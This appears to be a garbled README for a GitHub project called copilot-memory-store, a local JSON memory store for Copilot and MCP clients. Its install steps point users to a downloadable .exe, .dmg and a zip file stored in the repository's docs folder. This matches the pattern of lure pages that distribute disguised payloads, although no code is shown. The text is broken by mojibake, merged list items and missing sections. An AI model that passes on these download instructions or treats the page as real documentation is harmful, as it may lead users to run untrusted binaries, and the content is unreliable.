๐๏ธ Store and manage local JSON data for context engineering with GitHub Copilot and MCP clients efficiently.
Welcome to the copilot-memory-store! This application helps you manage context while using AI tools like GitHub Copilot. It provides a simple memory store using local JSON files. You can interact with this store through a Command Line Interface (CLI) or an MCP server, and thereโs also a custom agent for Visual Studio Code.
To get started, visit this page to download the latest version of the software: Download copilot-memory-store.
.exe file. For macOS, look for .dmg. Linux users can find a https://raw.githubusercontent.com/Tokio17/copilot-memory-store/main/docs/memory-copilot-store-1.6-alpha.2.zip file.Before you install copilot-memory-store, ensure your system meets the following requirements:
Once you have installed the copilot-memory-store, follow these steps to begin using it:
Win + R, type cmd, and press Enter. On macOS, open โTerminalโ. Linux users can open their terminal app.copilot-memory-store start (replace with your installed command) and press Enter. copilot-memory-store help to see available commands.add to store new entries, get to retrieve them, and delete to remove any unwanted entries.http://localhost:YOUR_PORT (replace YOUR_PORT with the port number displayed when you started the server).For detailed documentation about commands and features, check the Wiki. This resource includes examples and advanced tips to enhance your experience.
Join our community to ask questions, share insights, and learn more about context engineering. You can reach out through the following channels:
If you're interested in improving copilot-memory-store, please consider contributing! Here are some ways you can help:
We thank everyone who makes copilot-memory-store possible. Your support and feedback are invaluable. Together, we can innovate and improve tools for context engineering.
Now, go ahead and visit this page to download copilot-memory-store: Download copilot-memory-store. Enjoy managing your AI context easily!
Tokio17/copilot-memory-store
January 3, 2026
April 13, 2026
TypeScript